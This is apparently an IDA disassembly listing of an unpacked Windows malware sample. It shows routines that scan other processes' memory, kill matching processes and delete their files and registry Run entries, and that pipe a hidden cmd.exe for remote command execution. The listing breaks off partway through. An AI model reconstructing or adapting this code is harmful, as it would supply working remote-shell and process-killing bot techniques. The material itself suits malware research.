;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : A6117C4A3467CDFE6B22FB84D051A4B3
; File Name : u:\work\a6117c4a3467cdfe6b22fb84d051a4b3_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00021000 ( 135168.)
; Section size in file : 00021000 ( 135168.)
; Offset to raw data for section: 00001000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_packed segment para public 'CODE' use32
assume cs:_packed
;org 401000h
assume es:nothing, ss:nothing, ds:_packed, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; CODE XREF: sub_401146+31�p
; sub_401146+43�p ...
var_268 = dword ptr -268h
var_264 = dword ptr -264h
var_260 = byte ptr -260h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = byte ptr -218h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = byte ptr -10Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 268h
and [ebp+var_8], 0
and [ebp+var_4], 0
jmp short loc_40101A
; ---------------------------------------------------------------------------
loc_401013: ; CODE XREF: sub_401000+13C�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40101A: ; CODE XREF: sub_401000+11�j
mov eax, [ebp+var_4]
cmp off_418000[eax*4], 0
jz loc_401141
mov eax, [ebp+var_4]
push off_418000[eax*4]
lea eax, [ebp+var_260]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_260]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_110]
push eax
push 3
push 0
lea eax, [ebp+var_260]
push eax
push [ebp+arg_0]
call dword_417008 ; RegOpenKeyExA
and [ebp+var_220], 0
jmp short loc_401081
; ---------------------------------------------------------------------------
loc_401074: ; CODE XREF: sub_401000:loc_40112B�j
mov eax, [ebp+var_220]
inc eax
mov [ebp+var_220], eax
loc_401081: ; CODE XREF: sub_401000+72�j
mov [ebp+var_21C], 104h
mov [ebp+var_224], 104h
lea eax, [ebp+var_224]
push eax
lea eax, [ebp+var_10C]
push eax
lea eax, [ebp+var_114]
push eax
push 0
lea eax, [ebp+var_21C]
push eax
lea eax, [ebp+var_218]
push eax
push [ebp+var_220]
push [ebp+var_110]
call dword_417000 ; RegEnumValueA
mov [ebp+var_264], eax
cmp [ebp+var_264], 0
jz short loc_4010DD
jmp short loc_401130
; ---------------------------------------------------------------------------
loc_4010DD: ; CODE XREF: sub_401000+D9�j
cmp [ebp+var_114], 1
jnz short loc_40112B
push [ebp+arg_4]
push [ebp+var_224]
lea eax, [ebp+var_10C]
push eax
call sub_407ACA
add esp, 0Ch
mov [ebp+var_268], eax
cmp [ebp+var_268], 0
jz short loc_40112B
lea eax, [ebp+var_218]
push eax
push [ebp+var_110]
call dword_417004 ; RegDeleteValueA
test eax, eax
jnz short loc_40112B
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_40112B: ; CODE XREF: sub_401000+E4�j
; sub_401000+10B�j ...
jmp loc_401074
; ---------------------------------------------------------------------------
loc_401130: ; CODE XREF: sub_401000+DB�j
push [ebp+var_110]
call dword_417028 ; RegCloseKey
jmp loc_401013
; ---------------------------------------------------------------------------
loc_401141: ; CODE XREF: sub_401000+25�j
mov eax, [ebp+var_8]
leave
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401146 proc near ; CODE XREF: sub_401244+459�p
; sub_40A9CF+A72�p
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10Ch
push 80h
push [ebp+arg_0]
call dword_4170A8 ; SetFileAttributesA
test eax, eax
jnz short loc_401166
jmp locret_401242
; ---------------------------------------------------------------------------
loc_401166: ; CODE XREF: sub_401146+19�j
push [ebp+arg_0]
call dword_4170AC ; DeleteFileA
push [ebp+arg_0]
push 80000001h
call sub_401000
pop ecx
pop ecx
mov [ebp+var_4], eax
push [ebp+arg_0]
push 80000002h
call sub_401000
pop ecx
pop ecx
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
cmp [ebp+var_4], 0
jnz locret_401242
push 104h
push [ebp+arg_0]
lea eax, [ebp+var_108]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_108]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_10C], eax
jmp short loc_4011DB
; ---------------------------------------------------------------------------
loc_4011CE: ; CODE XREF: sub_401146:loc_40121A�j
mov eax, [ebp+var_10C]
dec eax
mov [ebp+var_10C], eax
loc_4011DB: ; CODE XREF: sub_401146+86�j
cmp [ebp+var_10C], 0
jz short loc_40121C
mov eax, [ebp+arg_0]
add eax, [ebp+var_10C]
movsx eax, byte ptr [eax-1]
cmp eax, 5Ch
jnz short loc_40121A
push 104h
mov eax, [ebp+var_10C]
lea eax, [ebp+eax+var_108]
push eax
lea eax, [ebp+var_108]
push eax
call sub_407A56
add esp, 0Ch
jmp short loc_40121C
; ---------------------------------------------------------------------------
loc_40121A: ; CODE XREF: sub_401146+AE�j
jmp short loc_4011CE
; ---------------------------------------------------------------------------
loc_40121C: ; CODE XREF: sub_401146+9C�j
; sub_401146+D2�j
lea eax, [ebp+var_108]
push eax
push 80000001h
call sub_401000
pop ecx
pop ecx
lea eax, [ebp+var_108]
push eax
push 80000002h
call sub_401000
pop ecx
pop ecx
locret_401242: ; CODE XREF: sub_401146+1B�j
; sub_401146+56�j
leave
retn
sub_401146 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401244 proc near ; DATA XREF: sub_4017AA+9D�o
var_3E8 = dword ptr -3E8h
var_3E4 = byte ptr -3E4h
var_3E0 = dword ptr -3E0h
var_3DC = dword ptr -3DCh
var_3D8 = dword ptr -3D8h
var_3D4 = dword ptr -3D4h
var_3D0 = dword ptr -3D0h
var_3CC = byte ptr -3CCh
var_2C8 = dword ptr -2C8h
var_2C4 = dword ptr -2C4h
var_2C0 = dword ptr -2C0h
var_2BC = dword ptr -2BCh
var_2B8 = dword ptr -2B8h
var_2B4 = dword ptr -2B4h
var_2B0 = dword ptr -2B0h
var_2AC = dword ptr -2ACh
var_2A8 = byte ptr -2A8h
var_2A7 = dword ptr -2A7h
var_2A3 = byte ptr -2A3h
var_1A3 = byte ptr -1A3h
var_B = byte ptr -0Bh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3E8h
push esi
push edi
push 2ACh
push [ebp+arg_0]
lea eax, [ebp+var_2AC]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
movzx eax, [ebp+var_2A8]
test eax, eax
jz short loc_40129D
lea eax, [ebp+var_2A3]
push eax
mov eax, [ebp+var_2AC]
push dword ptr [eax]
push offset dword_418144
lea eax, [ebp+var_1A3]
push eax
call sub_40D53F
add esp, 10h
loc_40129D: ; CODE XREF: sub_401244+34�j
call sub_406041
mov [ebp+var_2B4], eax
cmp [ebp+var_2B4], 0
jnz short loc_4012C4
push [ebp+var_2AC]
call sub_409763
pop ecx
xor eax, eax
jmp loc_4017A4
; ---------------------------------------------------------------------------
loc_4012C4: ; CODE XREF: sub_401244+6B�j
push 10000h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_2B8], eax
and [ebp+var_2BC], 0
and [ebp+var_2B0], 0
jmp short loc_4012F2
; ---------------------------------------------------------------------------
loc_4012E5: ; CODE XREF: sub_401244+E2�j
; sub_401244+12B�j ...
mov eax, [ebp+var_2B0]
inc eax
mov [ebp+var_2B0], eax
loc_4012F2: ; CODE XREF: sub_401244+9F�j
mov eax, [ebp+var_2B4]
mov ecx, [ebp+var_2B0]
cmp ecx, [eax]
jge loc_401710
mov esi, [ebp+var_2B0]
imul esi, 114h
mov eax, [ebp+var_2B4]
mov edi, [eax+4]
call dword_4170E8 ; GetCurrentProcessId
cmp [edi+esi], eax
jnz short loc_401328
jmp short loc_4012E5
; ---------------------------------------------------------------------------
loc_401328: ; CODE XREF: sub_401244+E0�j
push 104h
lea eax, [ebp+var_3CC]
push eax
push 0
call dword_41708C ; GetModuleHandleA
push eax
call dword_417090 ; GetModuleFileNameA
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
lea eax, [ebp+var_3CC]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_401374
jmp loc_4012E5
; ---------------------------------------------------------------------------
loc_401374: ; CODE XREF: sub_401244+129�j
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
push dword ptr [ecx+eax]
push 0
movzx eax, [ebp+var_2A8]
neg eax
sbb eax, eax
add eax, 11h
push eax
call dword_417094 ; OpenProcess
mov [ebp+var_2C4], eax
cmp [ebp+var_2C4], 0
jnz short loc_4013B7
jmp loc_4012E5
; ---------------------------------------------------------------------------
loc_4013B7: ; CODE XREF: sub_401244+16C�j
and [ebp+var_2C0], 0
and [ebp+var_2C8], 0
loc_4013C5: ; CODE XREF: sub_401244:loc_4016FA�j
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
mov eax, [ecx+eax+8]
sub eax, [ebp+var_2C0]
cmp eax, 10000h
jbe short loc_4013F7
mov [ebp+var_3E8], 10000h
jmp short loc_40141C
; ---------------------------------------------------------------------------
loc_4013F7: ; CODE XREF: sub_401244+1A5�j
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
mov eax, [ecx+eax+8]
sub eax, [ebp+var_2C0]
mov [ebp+var_3E8], eax
loc_40141C: ; CODE XREF: sub_401244+1B1�j
mov eax, [ebp+var_3E8]
mov [ebp+var_3D0], eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_3D0]
push [ebp+var_2B8]
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
mov eax, [ecx+eax+4]
add eax, [ebp+var_2C0]
push eax
push [ebp+var_2C4]
call dword_417098 ; ReadProcessMemory
mov [ebp+var_3D4], eax
cmp [ebp+var_3D4], 0
jz loc_4016C5
cmp [ebp+var_2C8], 0
jz loc_4016C5
and [ebp+var_3D8], 0
and [ebp+var_3DC], 0
loc_401495: ; DATA XREF: .packed:0041AD00�o
jmp short loc_4014A4
; ---------------------------------------------------------------------------
loc_401497: ; CODE XREF: sub_401244:loc_4015DB�j
mov eax, [ebp+var_3DC]
inc eax
mov [ebp+var_3DC], eax
loc_4014A4: ; CODE XREF: sub_401244:loc_401495�j
mov eax, [ebp+var_2C8]
sub eax, [ebp+var_2A7]
cmp [ebp+var_3DC], eax
ja loc_4015E0
mov eax, [ebp+var_2B8]
add eax, [ebp+var_3DC]
movsx eax, byte ptr [eax]
movsx ecx, [ebp+var_2A3]
cmp eax, ecx
jz short loc_401514
mov eax, [ebp+var_2B8]
add eax, [ebp+var_3DC]
movsx eax, byte ptr [eax]
movsx ecx, [ebp+var_2A3]
add ecx, 20h
cmp eax, ecx
jz short loc_401514
mov eax, [ebp+var_2B8]
add eax, [ebp+var_3DC]
movsx eax, byte ptr [eax]
movsx ecx, [ebp+var_2A3]
sub ecx, 20h
cmp eax, ecx
jnz loc_4015DB
loc_401514: ; CODE XREF: sub_401244+290�j
; sub_401244+2AD�j
mov [ebp+var_3E0], 1
jmp short loc_40152D
; ---------------------------------------------------------------------------
loc_401520: ; CODE XREF: sub_401244:loc_4015D6�j
mov eax, [ebp+var_3E0]
inc eax
mov [ebp+var_3E0], eax
loc_40152D: ; CODE XREF: sub_401244+2DA�j
mov eax, [ebp+var_3E0]
movsx eax, [ebp+eax+var_2A3]
test eax, eax
jnz short loc_401556
mov eax, [ebp+var_2B8]
add eax, [ebp+var_3DC]
mov [ebp+var_3D8], eax
jmp loc_40179F
; ---------------------------------------------------------------------------
loc_401556: ; CODE XREF: sub_401244+2F9�j
mov eax, [ebp+var_3E0]
movsx eax, [ebp+eax+var_2A3]
mov ecx, [ebp+var_3DC]
add ecx, [ebp+var_3E0]
mov edx, [ebp+var_2B8]
movsx ecx, byte ptr [edx+ecx]
cmp eax, ecx
jz short loc_4015D6
mov eax, [ebp+var_3E0]
movsx eax, [ebp+eax+var_2A3]
mov ecx, [ebp+var_3DC]
add ecx, [ebp+var_3E0]
mov edx, [ebp+var_2B8]
movsx ecx, byte ptr [edx+ecx]
add ecx, 20h
cmp eax, ecx
jz short loc_4015D6
mov eax, [ebp+var_3E0]
movsx eax, [ebp+eax+var_2A3]
mov ecx, [ebp+var_3DC]
add ecx, [ebp+var_3E0]
mov edx, [ebp+var_2B8]
movsx ecx, byte ptr [edx+ecx]
sub ecx, 20h
cmp eax, ecx
jz short loc_4015D6
jmp short loc_4015DB
; ---------------------------------------------------------------------------
loc_4015D6: ; CODE XREF: sub_401244+338�j
; sub_401244+363�j ...
jmp loc_401520
; ---------------------------------------------------------------------------
loc_4015DB: ; CODE XREF: sub_401244+2CA�j
; sub_401244+390�j
jmp loc_401497
; ---------------------------------------------------------------------------
loc_4015E0: ; CODE XREF: sub_401244+272�j
; sub_401244:loc_40179F�j
cmp [ebp+var_3D8], 0
jz loc_4016C5
mov eax, [ebp+var_2BC]
inc eax
mov [ebp+var_2BC], eax
movzx eax, [ebp+var_2A8]
test eax, eax
jz short loc_401675
push 3E8h
call dword_41709C ; Sleep
mov al, [ebp+var_B]
mov [ebp+var_3E4], al
and [ebp+var_B], 0
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
push dword ptr [ecx+eax]
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
lea eax, [ebp+var_2A3]
push eax
push offset dword_41811C
lea eax, [ebp+var_1A3]
push eax
call sub_40D53F
add esp, 14h
mov al, [ebp+var_3E4]
mov [ebp+var_B], al
jmp short loc_4016A3
; ---------------------------------------------------------------------------
loc_401675: ; CODE XREF: sub_401244+3BF�j
push 0
push [ebp+var_2C4]
call dword_4170A0 ; TerminateProcess
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
call sub_401146
pop ecx
loc_4016A3: ; CODE XREF: sub_401244+42F�j
mov eax, [ebp+var_2AC]
cmp dword ptr [eax+4], 0
jz short loc_4016C0
push [ebp+var_2C4]
call dword_4170A4 ; CloseHandle
jmp loc_40179A
; ---------------------------------------------------------------------------
loc_4016C0: ; CODE XREF: sub_401244+469�j
jmp loc_401795
; ---------------------------------------------------------------------------
loc_4016C5: ; CODE XREF: sub_401244+230�j
; sub_401244+23D�j ...
mov eax, [ebp+var_2C0]
add eax, [ebp+var_3D0]
mov [ebp+var_2C0], eax
mov eax, [ebp+var_2B0]
imul eax, 114h
mov ecx, [ebp+var_2B4]
mov ecx, [ecx+4]
mov edx, [ebp+var_2C0]
cmp edx, [ecx+eax+8]
jnz short loc_4016FA
jmp short loc_4016FF
; ---------------------------------------------------------------------------
loc_4016FA: ; CODE XREF: sub_401244+4B2�j
jmp loc_4013C5
; ---------------------------------------------------------------------------
loc_4016FF: ; CODE XREF: sub_401244+4B4�j
; sub_401244:loc_401795�j
push [ebp+var_2C4]
call dword_4170A4 ; CloseHandle
jmp loc_4012E5
; ---------------------------------------------------------------------------
loc_401710: ; CODE XREF: sub_401244+BC�j
; sub_401244:loc_40179A�j
push [ebp+var_2B4]
call sub_40636E
pop ecx
push [ebp+var_2B8]
call sub_416B4C ; free
pop ecx
movzx eax, [ebp+var_2A8]
test eax, eax
jz short loc_401785
push 3E8h
call dword_41709C ; Sleep
cmp [ebp+var_2BC], 0
jnz short loc_401764
lea eax, [ebp+var_2A3]
push eax
push offset dword_4180F8
lea eax, [ebp+var_1A3]
push eax
call sub_40D53F
add esp, 0Ch
jmp short loc_401785
; ---------------------------------------------------------------------------
loc_401764: ; CODE XREF: sub_401244+501�j
lea eax, [ebp+var_2A3]
push eax
push [ebp+var_2BC]
push offset dword_4180CC
lea eax, [ebp+var_1A3]
push eax
call sub_40D53F
add esp, 10h
loc_401785: ; CODE XREF: sub_401244+4ED�j
; sub_401244+51E�j
push [ebp+var_2AC]
call sub_409763
pop ecx
xor eax, eax
jmp short loc_4017A4
; ---------------------------------------------------------------------------
loc_401795: ; CODE XREF: sub_401244:loc_4016C0�j
jmp loc_4016FF
; ---------------------------------------------------------------------------
loc_40179A: ; CODE XREF: sub_401244+477�j
jmp loc_401710
; ---------------------------------------------------------------------------
loc_40179F: ; CODE XREF: sub_401244+30D�j
jmp loc_4015E0
; ---------------------------------------------------------------------------
loc_4017A4: ; CODE XREF: sub_401244+7B�j
; sub_401244+54F�j
pop edi
pop esi
leave
retn 4
sub_401244 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4017AA proc near ; CODE XREF: sub_40A9CF+AA1�p
; sub_40A9CF+AD2�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_4], 0
jz short loc_4017C2
push [ebp+arg_4]
call sub_416B40 ; strlen
pop ecx
test eax, eax
jnz short loc_4017C7
loc_4017C2: ; CODE XREF: sub_4017AA+9�j
jmp locret_401854
; ---------------------------------------------------------------------------
loc_4017C7: ; CODE XREF: sub_4017AA+16�j
push 2ACh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4017DD
jmp short locret_401854
; ---------------------------------------------------------------------------
loc_4017DD: ; CODE XREF: sub_4017AA+2F�j
mov eax, [ebp+var_4]
mov cl, [ebp+arg_8]
mov [eax+4], cl
push [ebp+arg_4]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_4]
mov [ecx+5], eax
push 100h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 9
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 109h
push eax
call sub_405F67
pop ecx
pop ecx
movzx eax, [ebp+arg_8]
test eax, eax
jz short loc_401830
mov [ebp+var_8], offset aListing ; "Listing"
jmp short loc_401837
; ---------------------------------------------------------------------------
loc_401830: ; CODE XREF: sub_4017AA+7B�j
mov [ebp+var_8], offset aKilling ; "Killing"
loc_401837: ; CODE XREF: sub_4017AA+84�j
push [ebp+arg_4]
push [ebp+var_8]
push offset dword_418174
push 0
push [ebp+var_4]
push offset sub_401244
call sub_4095A4
add esp, 18h
locret_401854: ; CODE XREF: sub_4017AA:loc_4017C2�j
; sub_4017AA+31�j
leave
retn
sub_4017AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401856 proc near ; CODE XREF: sub_401981+A8�p
; sub_401981+E1�p ...
push ebp
mov ebp, esp
cmp dword_41DE24, 0FFFFFFFFh
jz short loc_40186E
push dword_41DE24
call dword_4170A4 ; CloseHandle
loc_40186E: ; CODE XREF: sub_401856+A�j
cmp dword_41DE18, 0FFFFFFFFh
jz short loc_401883
push dword_41DE18
call dword_4170A4 ; CloseHandle
loc_401883: ; CODE XREF: sub_401856+1F�j
cmp dword_41DE1C, 0FFFFFFFFh
jz short loc_401898
push dword_41DE1C
call dword_4170A4 ; CloseHandle
loc_401898: ; CODE XREF: sub_401856+34�j
cmp dword_41DE20, 0FFFFFFFFh
jz short loc_4018AD
push dword_41DE20
call dword_4170A4 ; CloseHandle
loc_4018AD: ; CODE XREF: sub_401856+49�j
pop ebp
retn
sub_401856 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4018AF proc near ; CODE XREF: sub_401981+28A�p
; sub_401981+395�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 200h
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+189h]
test eax, eax
jnz short loc_4018D4
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Dh]
test eax, eax
jz short loc_401922
loc_4018D4: ; CODE XREF: sub_4018AF+15�j
; sub_4018AF:loc_401920�j
push 32h
call dword_41709C ; Sleep
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+189h]
test eax, eax
jz short loc_4018FE
call sub_416B64 ; clock
sub eax, dword_41DE2C
cmp eax, 1F4h
jb short loc_4018FE
jmp short loc_401922
; ---------------------------------------------------------------------------
loc_4018FE: ; CODE XREF: sub_4018AF+39�j
; sub_4018AF+4B�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Dh]
test eax, eax
jz short loc_401920
call sub_416B64 ; clock
sub eax, dword_41DE2C
cmp eax, 0FAh
jb short loc_401920
jmp short loc_401922
; ---------------------------------------------------------------------------
loc_401920: ; CODE XREF: sub_4018AF+5B�j
; sub_4018AF+6D�j
jmp short loc_4018D4
; ---------------------------------------------------------------------------
loc_401922: ; CODE XREF: sub_4018AF+23�j
; sub_4018AF+4D�j ...
call sub_416B64 ; clock
mov dword_41DE2C, eax
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_401942
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 0Dh
jnz short loc_401957
loc_401942: ; CODE XREF: sub_4018AF+86�j
push offset dword_4181A4
lea eax, [ebp+var_200]
push eax
call sub_416B5E ; sprintf
pop ecx
pop ecx
jmp short loc_40196E
; ---------------------------------------------------------------------------
loc_401957: ; CODE XREF: sub_4018AF+91�j
push 200h
push [ebp+arg_4]
lea eax, [ebp+var_200]
push eax
call sub_407A56
add esp, 0Ch
loc_40196E: ; CODE XREF: sub_4018AF+A6�j
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_40D53F
pop ecx
pop ecx
leave
retn
sub_4018AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401981 proc near ; DATA XREF: sub_401D6E+88�o
var_730 = dword ptr -730h
var_72C = dword ptr -72Ch
var_728 = dword ptr -728h
var_724 = dword ptr -724h
var_720 = dword ptr -720h
var_714 = dword ptr -714h
var_510 = byte ptr -510h
var_36C = dword ptr -36Ch
var_368 = dword ptr -368h
var_364 = dword ptr -364h
var_360 = dword ptr -360h
var_334 = dword ptr -334h
var_330 = word ptr -330h
var_328 = dword ptr -328h
var_324 = dword ptr -324h
var_320 = dword ptr -320h
var_31C = byte ptr -31Ch
var_318 = dword ptr -318h
var_314 = dword ptr -314h
var_310 = dword ptr -310h
var_30C = byte ptr -30Ch
var_208 = dword ptr -208h
var_204 = byte ptr -204h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 730h
push 3A7h
push [ebp+arg_0]
lea eax, [ebp+var_714]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
call sub_416B64 ; clock
sub eax, 1F4h
mov dword_41DE2C, eax
push 0
lea eax, [ebp+var_30C]
push eax
push 104h
push 0
push offset aCmd_exe ; "cmd.exe"
push 0
call dword_41706C ; SearchPathA
test eax, eax
jnz short loc_4019ED
push [ebp+var_714]
call sub_409763
pop ecx
xor eax, eax
jmp locret_401D35
; ---------------------------------------------------------------------------
loc_4019ED: ; CODE XREF: sub_401981+57�j
mov [ebp+var_318], 0Ch
mov [ebp+var_310], 1
and [ebp+var_314], 0
push 0
lea eax, [ebp+var_318]
push eax
lea eax, [ebp+var_368]
push eax
lea eax, [ebp+var_364]
push eax
call dword_417070 ; CreatePipe
test eax, eax
jnz short loc_401A41
call sub_401856
push [ebp+var_714]
call sub_409763
pop ecx
xor eax, eax
jmp locret_401D35
; ---------------------------------------------------------------------------
loc_401A41: ; CODE XREF: sub_401981+A6�j
push 0
lea eax, [ebp+var_318]
push eax
lea eax, [ebp+var_36C]
push eax
lea eax, [ebp+var_728]
push eax
call dword_417070 ; CreatePipe
test eax, eax
jnz short loc_401A7A
call sub_401856
push [ebp+var_714]
call sub_409763
pop ecx
xor eax, eax
jmp locret_401D35
; ---------------------------------------------------------------------------
loc_401A7A: ; CODE XREF: sub_401981+DF�j
push 3
push 0
push 0
push offset dword_41DE20
call dword_417074 ; GetCurrentProcess
push eax
push [ebp+var_36C]
call dword_417074 ; GetCurrentProcess
push eax
call dword_4170F0 ; DuplicateHandle
test eax, eax
jnz short loc_401ABB
call sub_401856
push [ebp+var_714]
call sub_409763
pop ecx
xor eax, eax
jmp locret_401D35
; ---------------------------------------------------------------------------
loc_401ABB: ; CODE XREF: sub_401981+120�j
push 10h
push 0
lea eax, [ebp+var_724]
push eax
call sub_416B6A ; memset
add esp, 0Ch
push 44h
push 0
lea eax, [ebp+var_360]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_360], 44h
mov [ebp+var_334], 101h
and [ebp+var_330], 0
mov eax, [ebp+var_728]
mov [ebp+var_328], eax
mov eax, [ebp+var_368]
mov [ebp+var_324], eax
mov eax, [ebp+var_368]
mov [ebp+var_320], eax
lea eax, [ebp+var_724]
push eax
lea eax, [ebp+var_360]
push eax
push 0
push 0
push 0
push 1
push 0
push 0
push offset byte_41DE30
lea eax, [ebp+var_30C]
push eax
call dword_41707C ; CreateProcessA
test eax, eax
jnz short loc_401B69
call sub_401856
push [ebp+var_714]
call sub_409763
pop ecx
xor eax, eax
jmp locret_401D35
; ---------------------------------------------------------------------------
loc_401B69: ; CODE XREF: sub_401981+1CE�j
push [ebp+var_728]
call dword_4170A4 ; CloseHandle
mov eax, [ebp+var_364]
mov dword_41DE24, eax
mov eax, [ebp+var_36C]
mov dword_41DE18, eax
mov eax, [ebp+var_724]
mov dword_41DE1C, eax
push [ebp+var_720]
call dword_4170A4 ; CloseHandle
and [ebp+var_4], 0
and [ebp+var_208], 0
loc_401BAD: ; CODE XREF: sub_401981+2E9�j
; sub_401981+39C�j
mov eax, [ebp+var_714]
cmp dword ptr [eax+4], 0
jz short loc_401BBE
jmp loc_401D22
; ---------------------------------------------------------------------------
loc_401BBE: ; CODE XREF: sub_401981+236�j
and [ebp+var_208], 0
push 200h
push 0
lea eax, [ebp+var_204]
push eax
call sub_416B6A ; memset
add esp, 0Ch
push 0
push 0
lea eax, [ebp+var_4]
push eax
push 200h
lea eax, [ebp+var_204]
push eax
push dword_41DE24
call dword_417080 ; PeekNamedPipe
test eax, eax
jnz short loc_401C17
push offset aCouldNotReadDa ; "Could not read data from process."
lea eax, [ebp+var_510]
push eax
call sub_4018AF
pop ecx
pop ecx
jmp loc_401D22
; ---------------------------------------------------------------------------
loc_401C17: ; CODE XREF: sub_401981+27C�j
cmp [ebp+var_4], 0
jnz short loc_401C6F
mov [ebp+var_730], 103h
lea eax, [ebp+var_730]
push eax
push dword_41DE1C
call dword_417084 ; GetExitCodeProcess
test eax, eax
jz short loc_401C62
cmp [ebp+var_730], 103h
jz short loc_401C62
push offset aCmd_exeProcess ; "Cmd.exe process has terminated."
lea eax, [ebp+var_510]
push eax
call sub_40D53F
pop ecx
pop ecx
jmp loc_401D22
; ---------------------------------------------------------------------------
loc_401C62: ; CODE XREF: sub_401981+2BB�j
; sub_401981+2C7�j
push 0Ah
call dword_41709C ; Sleep
jmp loc_401BAD
; ---------------------------------------------------------------------------
loc_401C6F: ; CODE XREF: sub_401981+29A�j
and [ebp+var_72C], 0
jmp short loc_401C85
; ---------------------------------------------------------------------------
loc_401C78: ; CODE XREF: sub_401981:loc_401CAF�j
mov eax, [ebp+var_72C]
inc eax
mov [ebp+var_72C], eax
loc_401C85: ; CODE XREF: sub_401981+2F5�j
mov eax, [ebp+var_72C]
cmp eax, [ebp+var_4]
jnb short loc_401CB1
mov eax, [ebp+var_72C]
movsx eax, [ebp+eax+var_204]
cmp eax, 0Ah
jnz short loc_401CAF
mov [ebp+var_208], 1
jmp short loc_401CB1
; ---------------------------------------------------------------------------
loc_401CAF: ; CODE XREF: sub_401981+320�j
jmp short loc_401C78
; ---------------------------------------------------------------------------
loc_401CB1: ; CODE XREF: sub_401981+30D�j
; sub_401981+32C�j
cmp [ebp+var_208], 0
jz short loc_401CC6
mov eax, [ebp+var_72C]
inc eax
mov [ebp+var_4], eax
jmp short loc_401CCD
; ---------------------------------------------------------------------------
loc_401CC6: ; CODE XREF: sub_401981+337�j
mov [ebp+var_4], 200h
loc_401CCD: ; CODE XREF: sub_401981+343�j
push 200h
push 0
lea eax, [ebp+var_204]
push eax
call sub_416B6A ; memset
add esp, 0Ch
